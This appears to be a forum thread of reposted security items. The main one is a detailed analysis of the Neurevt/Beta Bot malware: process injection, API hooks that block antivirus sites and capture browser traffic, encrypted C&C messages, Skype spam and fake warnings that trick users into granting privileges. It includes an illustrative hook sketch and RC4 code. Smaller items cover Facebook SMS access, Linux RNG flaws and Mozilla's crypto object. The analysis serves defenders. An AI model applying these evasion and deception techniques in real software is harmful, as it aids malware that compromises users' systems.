Neurevt (also known as Beta Bot) is an HTTP bot [1] which entered the underground market around March 2013 and which is priced relatively cheaply [2]. Though still in its testing phase, the bot already has a lot of functionality along with an extendable and flexible infrastructure. Upon installation, the bot injects itself into almost all user processes to take over the whole system. Moreover, it utilizes a mechanism that makes use of Windows messages and the registry to coordinate the injected code. The bot communicates with its C&C server through HTTP requests. Different parts of the communication data are encrypted (mostly with RC4) separately. In this article, we will take a detailed look at this bot's infrastructure, communication protocol and encryption schemes. (This analysis is based on samples that were collected from March to June 2013.)

Installation/Deployment

Installation process

Just like most malware, the installation of Neurevt starts with it copying itself to a system folder. The folder is selected according to the machine's characteristics, such as the version of Windows, the service pack installed, and whether the OS is 64-bit. For example, on an x86 machine running Windows XP SP2, the chosen folder is %PROGRAM FILES%\COMMON FILES. The installer creates a sub-folder named 'winlogon.{2227A280-3AEA-1069-A2DE-08002B30309D}'. The first part of the folder name, 'winlogon', is obtained from the configuration of the bot, and the second part is a special GUID which makes the folder link to the 'Printers and Faxes' folder in Windows Explorer. This folder will act as the launching point each time the malware restarts. The installer then launches the new file and exits.

The newly launched copy creates a process of a system application, which also varies under different circumstances, and starts to inject. The injected data is within a continuous block of memory and has the data layout shown in the original article. Since this is the first time the malware has injected something into another process, the injected content runs as an independent application. I refer to it as the 'primary instance' to distinguish it from other instances that are injected into other processes. The primary instance searches for all running processes, and injects into those that fulfill the conditions listed in the original article.

This time, the injected data has the same layout as the primary instance. The only difference is in the 'local cfg' part, in which some data fields are modified to act differently, since some components should be loaded in the primary instance only. After injection, there should be one instance of the malware in every running user process. I refer to these as 'assistant instances'. There is code in every assistant instance that monitors the status of the primary instance. If the primary instance exits, for whatever reason, the assistant instance will attempt to restart the malware from its launch point.

After the malware has finished its deployment, the primary instance will start to communicate with the C&C server. The whole process looks like a traditional virus infecting a file system, but instead of infecting files, the malware infects running processes.

Gather local information

The first flag contains information about the Windows version, installed service pack, and whether the OS is 32- or 64-bit.
The second flag contains information about the following software or vendors: .Net Framework, Java, Steam, SysInternals tools, mIRC, Hex-Rays, Immunity Inc., CodeBlocks, 7-Zip, PrestoSoft, Nmap, Perl, Visual Studio and Wireshark. It also contains information that indicates whether the system: 1) has a battery, 2) has RDP records, 3) has UAC enabled.

The fourth flag contains information about installed AV software: Symantec, AVP, AVG, Avira, ESET, McAfee, Trend Micro, Avast, Microsoft Security Client, Bitdefender, BullGuard, Rising, Arcabit, Webroot, Emsisoft, F-Secure, Panda, PC Tools Internet Security and G Data AntiVirus.

Component thread

The malware creates threads to perform different kinds of jobs, such as communicating with the C&C server, checking data consistency, managing messages passed among threads (components), or monitoring and infecting USB drives. These threads act like software components. In order to load the threads properly, the malware defines a function, NewComponentThread, to create them (its definition is shown in the original article). ThreadProc is the routine that performs a particular job, while idx is the index assigned to it by the malware. The values 0-0x1E and 0x21 are idx values given to unique routines for which there should be only one running thread. The values 0x1F and 0x20 are for multiple-instance routines; if NewComponentThread is called with idx set to one of these two values, the function will assign a new idx to ThreadProc, which is the first available (unassigned) number from 0x22 upwards.

The malware maintains a list to keep track of all the threads that are created by the function. Each ThreadProc takes an entry pointed to by its idx. The structure of a list entry is shown in the original article.

Before actually starting the new 'component thread', NewComponentThread adds a short code stub and a wrapper function to ThreadProc. The code stub is written into ntdll's image, at a random location within the MZ header. This random location serves as the StartAddress when NewComponentThread calls CreateThread, so the start address of the 'component thread' is within the memory range of ntdll's image. This feature is used when the malware passes messages among its threads.

The wrapper function attempts to hide the thread from debuggers and updates the thread list before and after it calls ThreadProc. It also sets a specific TLS slot to a specific value, 1234. Since the malware's code always runs inside an injected process, API hooks are applied to monitor and manipulate the behavior of the host process. The specific TLS slot value is used to identify the malware's own threads, to which the API hooks should not be applied.

API hook

The malware applies the Ring 3 hook in two ways. First, the malware adds a pre-operation filter for each of the following Zw* APIs: ZwCreateFile, ZwOpenFile, ZwDeleteFile, ZwSetInformationFile, ZwQueryDirectoryFile, ZwCreateKey, ZwOpenKey, ZwSetValueKey, ZwOpenProcess, ZwTerminateProcess, ZwCreateThread, ZwCreateThreadEx, ZwResumeThread, ZwSuspendThread, ZwSetContextThread, ZwOpenThread, ZwUnmapViewOfSection, ZwDeviceIoControlFile, ZwQueueApcThread.

The filter first checks the specified TLS slot. If its value is 1234, the calling thread belongs to the malware; the filter does nothing and lets the thread call the real API. If the TLS slot is not 1234, the filter examines the object (process, thread, file, registry key) on which the operation will be performed; if the object belongs to the malware, the filter returns an error status to the calling thread.
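To make the mechanism concrete, here is a simplified sketch of my own (not Neurevt's actual code) of how such a pre-operation filter could distinguish the bot's own threads by the TLS slot value described above. The slot, helper function and demo values are all hypothetical.

/* Illustration only - my own sketch, not code recovered from Neurevt.
 * It mimics the pre-operation filter described above: the bot's threads
 * mark themselves by writing 1234 into a dedicated TLS slot, and the
 * filter blocks other threads' access to the bot's objects. */
#include <windows.h>
#include <winternl.h>
#include <stdio.h>

#define STATUS_OK            ((NTSTATUS)0x00000000L)
#define STATUS_ACCESS_DENIED ((NTSTATUS)0xC0000022L)

static DWORD g_tlsSlot;   /* hypothetical slot, allocated with TlsAlloc() */

/* Hypothetical stand-in: the real filter would check whether the handle
 * refers to one of the bot's own files, registry keys or processes. */
static BOOL ObjectBelongsToMalware(HANDLE object)
{
    (void)object;
    return TRUE;   /* pretend every object is the bot's, for the demo */
}

static NTSTATUS PreOperationFilter(HANDLE object)
{
    /* Threads created by the bot have 1234 in the TLS slot: let them through. */
    if ((DWORD_PTR)TlsGetValue(g_tlsSlot) == 1234)
        return STATUS_OK;

    /* A foreign thread touching a bot-owned object gets an error status. */
    if (ObjectBelongsToMalware(object))
        return STATUS_ACCESS_DENIED;

    return STATUS_OK;
}

int main(void)
{
    g_tlsSlot = TlsAlloc();

    /* A "foreign" thread (slot not set to 1234) is denied... */
    printf("foreign thread: 0x%08lX\n", (unsigned long)PreOperationFilter(NULL));

    /* ...while a bot thread marks itself first and is allowed through. */
    TlsSetValue(g_tlsSlot, (LPVOID)(DWORD_PTR)1234);
    printf("bot thread:     0x%08lX\n", (unsigned long)PreOperationFilter(NULL));

    TlsFree(g_tlsSlot);
    return 0;
}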
The second way it applies the Ring 3 hook is by placing an inline hook on the following two groups of APIs:

1) getaddrinfo, GetAddrInfoW, DnsQuery_W
2) HttpSendRequestW, PR_Write

The malware hooks the APIs in group 1 to block unwanted hosts. The host list is received from the bot server; most of the unwanted hosts are the web servers of anti-virus software vendors. The malware hooks the APIs in group 2 only if the injected process is one of the following browser processes: firefox.exe, iexplore.exe, chrome. The malware receives a list of URLs to be monitored from the bot server. If the browser sends requests to these URLs, the malware will capture the request data and send it back to the bot server.

Handling messages

There are multiple instances of the malware running in the system. To coordinate these instances, the malware creates a thread in each one as a handler of application-defined messages. Most of the messages are sent from the primary instance after it has received something from the bot server, to notify other instances to update their local data, such as the blocked host list and the monitored URL list mentioned earlier.

If one of the malware's threads is about to send a message, it enumerates all the running threads in the system, searching for those that have a start address within ntdll's image. As described in the 'Component thread' section, all the threads created by NewComponentThread fulfil this condition. The sending thread calls PostThreadMessage to send the message to them. Among these threads, only the message handlers (one in each malware instance) have a message queue (by calling IsGuiThread) for messages that are not associated with any window (a property of messages sent by PostThreadMessage), so the handlers will retrieve the message and respond accordingly.

Before a message is sent out, the sending thread adds a pre-defined modifier to the message identifier. This modifier is calculated from the signature string in the bot configuration and the computer name, and its value is in the range 0 to 31. The wParam and lParam are also modified, since they often carry values with specific meanings, such as a process ID or thread ID. In the handler thread, these values are restored by a reverse calculation before the message is handled. This means that, even if the messages passing among the malware's threads are being monitored, it is hard to understand their meaning. The messages supported by the handler thread are listed in Table 1.

Sharing data in registry

The malware stores shared data for all instances in registry values. The values are created under the key HKCU\Software\CLSID{random guid}{hash of configuration signature string}. The following are important values used by the malware:

CS1\S02: Encrypted data that stores the last received blocked host list.
CS1\S03: Encrypted data that stores the last received monitored URL list.
CS1\S01: The last received configuration.
CG1\CF01: Value of the DWORD at offset 0x20 in the last received response.
CG1\CF02: Value of the DWORD at offset 0x24 in the last received response.
CG1\CF03: Value of the DWORD at offset 0x28 in the last received response.
CG1\BIS: Flag that indicates that the process is running on a removable disk.
CG1\BID: The first launch time.
CG1\HAL: DWORD, set to 0xEE05 after installation has completed successfully.
CG1\LCT: Time of the last received bot response.

Bot Communication

Neurevt communicates with its C&C server through HTTP. Both the request and the response are encrypted with the RC4 algorithm.
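RC4 itself is a standard, well-documented stream cipher. For reference, here is a compact C implementation of its key scheduling and keystream generation (my own sketch, not code lifted from the bot); the main function uses the well-known "Key"/"Plaintext" test vector.

/* Reference RC4 implementation (the standard algorithm, not the bot's code).
 * Encrypts/decrypts buf in place with the given key. */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

void rc4(const unsigned char *key, size_t keylen, unsigned char *buf, size_t len)
{
    unsigned char S[256], tmp;
    size_t i;
    unsigned j = 0;

    /* Key-scheduling algorithm (KSA). */
    for (i = 0; i < 256; i++)
        S[i] = (unsigned char)i;
    for (i = 0; i < 256; i++) {
        j = (j + S[i] + key[i % keylen]) & 0xFF;
        tmp = S[i]; S[i] = S[j]; S[j] = tmp;
    }

    /* Pseudo-random generation algorithm (PRGA): XOR the keystream into buf. */
    {
        unsigned a = 0, b = 0;
        for (i = 0; i < len; i++) {
            a = (a + 1) & 0xFF;
            b = (b + S[a]) & 0xFF;
            tmp = S[a]; S[a] = S[b]; S[b] = tmp;
            buf[i] ^= S[(S[a] + S[b]) & 0xFF];
        }
    }
}

int main(void)
{
    unsigned char key[] = "Key";
    unsigned char msg[] = "Plaintext";
    size_t len = strlen((char *)msg);

    rc4(key, strlen((char *)key), msg, len);   /* encrypt in place */
    for (size_t i = 0; i < len; i++)
        printf("%02x", msg[i]);                /* expected: bbf316e8d940af0ad3 */
    printf("\n");

    rc4(key, strlen((char *)key), msg, len);   /* applying RC4 again decrypts */
    printf("%s\n", msg);
    return 0;
}

In Neurevt's case the interesting part is not the cipher but the keys, which, as described below, are assembled partly from bytes embedded in the bot's configuration and partly from per-message random bytes.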
The communication starts when the malware on an infected machine sends its first request to the bot server. The communication then proceeds in a 'Q & A' manner.

Bot configuration

Neurevt has a built-in configuration. The configuration data and the decryption code are both encrypted with RC4. The malware allocates a block of memory on the heap and decrypts the configuration there. The argument passed to the decryption thread is a pointer to a structure (shown in the original article); the fields between DecryptFunc and GetCriticalSection are functions that are used by the decryption function.

First, the decryption thread performs an integrity check by calculating the hash value of the key sequence and comparing it with a value that is embedded in the PE image. If the hash values are consistent, the thread allocates a block of memory and decrypts the configuration data into it.

lpKeyForReEncrypt is a pointer to a four-byte key sequence for re-encryption. It is generated randomly after the configuration data has been decrypted. The re-encryption also uses the RC4 algorithm. Its purpose is to protect the configuration data from being discovered in a memory dump. The re-encryption is done by the main thread after the decryption thread exits. Before the decryption thread exits, it stores the memory pointer and the re-encryption key in the memory block given by lpGlobalData. Any subsequent access to the configuration data is carried out using the following steps:

1) Allocate a block of memory and copy the re-encrypted data into it.
2) Decrypt and get the desired data.
3) Re-encrypt the data.
4) Release the memory.

The configuration data has a 718-byte header, which contains the fields shown in Table 2. There is an array at offset 0x2ce of the configuration data. Each entry stores information about a C&C server; normally there will be more than three entries in one configuration. The size of an entry is 0x280 bytes. The crucial fields are shown in Table 3.

Request format

Each request contains a 128-byte data block, which contains the fields shown in Table 4. The malware encrypts the data block with RC4. It uses a 12-byte key sequence, which is a combination of two parts. The first is an eight-byte sequence obtained from the chosen entry of the configuration data, at offset 0x26e. The second part is a random sequence obtained by calling CryptGenRandom; the length of this sequence is within a range from eight to 27 bytes. This part of the key and the encrypted data block are inserted into the query string.

If it is the first request sent to the bot servers, it will also contain the following three CS fields:

1) The full file path of the installed malware
2) The username in NameSamCompatible format
3) The name of the default web browser

These strings are encrypted separately with a loop-XOR algorithm and concatenated into a URL query string.

Bot response header format

The bot response contains a 0x5c-byte header and a body which consists of at most eight streams (only four streams are actually used). Both the header and the body are encrypted with RC4, and they are decrypted separately. The first four bytes of the header are appended to the eight-byte sequence in the configuration to form a 12-byte key sequence for decrypting the header. The following four bytes of the header and another eight-byte sequence in the configuration are concatenated to form another 12-byte key sequence for the response body. The response header has the structure shown in Table 5.
The Control flag in the response header is a bit-flag which triggers different behaviours of the malware, such as invoking routines that disable security software, or faking pop-up warning windows to trick the user into giving the malware permission to bypass UAC. The fields from 0x20 to 0x28 are three DWORDs which are stored in the registry values listed earlier; they are copied back to the bot server in the next request sent by the malware. The length array at 0x3C has eight entries, each denoting the length of the corresponding stream in the response body.

Bot response body

According to the response header format, there should be eight streams in the body, but the malware only has handling routines for the first four streams.

The first stream contains bot commands sent back by the bot server. The first word of the stream is the count of the commands in the stream. Each command is stored as a null-terminated string preceded by a 22-byte data block, which is not used in any of the malware's code. The malware identifies the command keyword by hash value. It has a list of handling routines; the structure of each list entry is shown in the original article.

The second stream contains a list of hosts to be blocked. The list is used in the following hooked functions: DnsQuery_W, GetAddrInfoW, getaddrinfo.

The third stream contains a list of URLs for which the malware will monitor outgoing HTTP requests. The list is used in the following hooked APIs: HttpSendRequestW, PR_Write.

The fourth stream in the response body contains data which can be used to generate a new configuration. The stream is in a format similar to that of an INI file. The malware compiles the stream into a binary data block which is organized in the structure described in the configuration section.

Spam through Skype

The malware uses Skype to spread any text material received from the bot server. There are two bot commands that will invoke the spreading job. The bot server sends the command along with a URL parameter pointing to a text file. Each line of the text file contains a locale-message pair delimited by a semicolon:

{locale name};{spam content}

The malware chooses one line according to the locale of the system's default language and sends the message in that line to all the Skype contacts except 'echo123', which is the name of Skype's echo service. To send the message, the malware creates a new process of itself with the command line parameters set to '/ssp {URL sent by bot server}'. The new process sets up communication between itself and the Skype client using the Skype API, and then starts to send Skype commands. The first command sent is 'SEARCH FRIENDS', which retrieves all the contacts of the logged-in user. For each contact, a 'MESSAGE' command is sent to the Skype client to generate an IM message carrying the chosen spam content.

Bypassing UAC

On a UAC-enabled system, if the malware needs to elevate its privileges, it doesn't play some trick to avoid prompting the user or to disable UAC once and for all. Instead, it directly 'asks' the user for approval. The malware creates a process of 'Cmd.exe' and puts the malware's file path in the command line argument. When the prompt window pops up, it shows that 'Cmd.exe', which is a Windows application, is asking for privilege elevation. Careless users tend to approve the request. Then a new process of the malware is created by 'Cmd.exe', and it inherits the system privileges of 'Cmd.exe'.
Clicking 'show detail' reveals the trick (Figure 18). Under some circumstances, the malware will give a fake warning about system corruption and ask the user to approve a 'restoration utility' in order to gain high privileges (Figure 19). If the user denies it, the malware will continue to pop up warnings and re-prompt the user several times. The malware prepares warnings in the following languages: Russian, Portuguese, German, French, Dutch, Arabic, Hindi, Persian, Simplified Chinese, Turkish, Indonesian, Italian, Spanish, Polish, Japanese and Vietnamese. It chooses one of them according to the system's default language locale, so that a language inconsistency does not raise the user's suspicion.

Conclusion

As this analysis shows, the communication protocol has reserved enough space for new functionality to be added in the future. There are unused fields in both the request and response structures, and four of the streams in the response data have no code to handle them. Though Neurevt has only just entered the market, the bot's author is likely to develop it rapidly; we will undoubtedly see new features of Neurevt soon.

Sursa: Fortinet Blog | News and Threat Research - NEUREVT Bot Analysis
-
Facebook wants to read your SMS messages
Written by Nick Farrell

Targeted adverts

Facebook's latest update to its hugely popular mobile app is creating a storm by asking British users if it can access their SMS and MMS messages. Because Facebook is a US company, that means the US spooks can tap the social notworking site to read your messages.

While many of us can't imagine what use the NSA will have for knowing that my wife is coming home and I need to get more cat litter, there are some companies which should be jolly concerned – particularly now it is known that the US is stealing secrets from foreign organisations.

Facebook simply wants to access more of your data to feed you more targeted ads, although Facebook Android engineer Franci Penov said that it needed to read your SMSes so that it could automatically intercept login-approval SMS messages for people who have turned on 2-factor authentication. It seems then that I was right not to be dumb enough to give Google or Facebook my mobile number, as this 2-factor authentication is more of a security nightmare than it is a help.

The reason Facebook needs access to all your messages, rather than just those from a specific number, is that Android's permissions system does not allow for that. Penov said that the data is not sent back to the company's servers, which means it could not be used to help put adverts in your timeline based on what you have written in your messages.

But in IT security the path to hell is paved with good intentions. It sounds to me like a system which is set up to read SMS messages is a vulnerability waiting to happen. Assuming that it has not already.

Sursa: Facebook wants to read your SMS messages
-
Analysis of the Linux Random Number Generator

Zvi Gutterman (Safend and The Hebrew University of Jerusalem), Benny Pinkas (University of Haifa), Tzachy Reinman (The Hebrew University of Jerusalem)
March 6, 2006

Abstract

Linux is the most popular open source project. The Linux random number generator is part of the kernel of all Linux distributions and is based on generating randomness from the entropy of operating system events. The output of this generator is used for almost every security protocol, including TLS/SSL key generation, choosing TCP sequence numbers, and file system and email encryption. Although the generator is part of an open source project, its source code (about 2500 lines of code) is poorly documented and patched with hundreds of code patches. We used dynamic and static reverse engineering to learn the operation of this generator. This paper presents a description of the underlying algorithms and exposes several security vulnerabilities. In particular, we show an attack on the forward security of the generator which enables an adversary who exposes the state of the generator to compute previous states and outputs. In addition, we present a few cryptographic flaws in the design of the generator, as well as measurements of the actual entropy collected by it, and a critical analysis of the use of the generator in Linux distributions on disk-less devices.

1 Introduction

Randomness is a crucial resource for cryptography, and random number generators are therefore critical building blocks of almost all cryptographic systems. The security analysis of almost any system assumes a source of random bits, whose output can be used, for example, for the purpose of choosing keys or choosing random nonces. Weak random values may result in an adversary being able to break the system, as was demonstrated by breaking the Netscape implementation of SSL [8], or predicting Java session-ids [11].

Since a physical source of randomness is often too costly, most systems use a pseudo-random number generator. The state of the generator is seeded, and periodically refreshed, by entropy which is gathered from physical sources (such as from timing disk operations, or from a human interface). The state is updated using an algorithm which updates the state and outputs pseudo-random bits.

This paper studies the Linux pseudo-random number generator (which we denote as the LRNG). This is the most popular open source pseudo-random number generator, and it is embedded in all running Linux environments, which include desktops, servers, PDAs, smart phones, media centers, and even routers.

Properties required of pseudo-random number generators. A pseudo-random number generator must be secure against external and internal attacks. The attacker is assumed to know the code of the generator, and might have partial knowledge of the entropy used for refreshing the generator's state. We list here the most basic security requirements, using common terminology (e.g., of [3]). (A more detailed list of potential vulnerabilities appears in [14].)

Download: http://www.pinkas.net/PAPERS/gpr06.pdf
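For context (my own sketch, not taken from the paper): userspace applications typically consume the LRNG's output through the /dev/random and /dev/urandom character devices, for example like this:

/* Sketch: reading random bytes from the Linux RNG's userspace interface.
 * /dev/urandom is the non-blocking device fed by the kernel generator
 * analysed in the paper. */
#include <stdio.h>

int main(void)
{
    unsigned char key[16];

    FILE *f = fopen("/dev/urandom", "rb");
    if (f == NULL) {
        perror("fopen /dev/urandom");
        return 1;
    }
    if (fread(key, 1, sizeof(key), f) != sizeof(key)) {
        fprintf(stderr, "short read from /dev/urandom\n");
        fclose(f);
        return 1;
    }
    fclose(f);

    /* Print the bytes as hex, e.g. as a freshly generated 128-bit key. */
    for (size_t i = 0; i < sizeof(key); i++)
        printf("%02x", key[i]);
    printf("\n");
    return 0;
}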
-
Using the Mozilla crypto object from JavaScript

Mozilla defines a special JavaScript object to allow web pages access to certain cryptographic-related services. These services are a balance between the functionality web pages need and the requirement to protect users from malicious web sites. Most of these services are available via the DOM window object as window.crypto. Services are provided to enable: smart card events, generating certificate requests, importing user certs, generating random numbers, logging out of your tokens, and signing text.

Articol: https://developer.mozilla.org/en-US/docs/JavaScript_crypto
-
Which CSS, style.css? How is it supposed to disappear?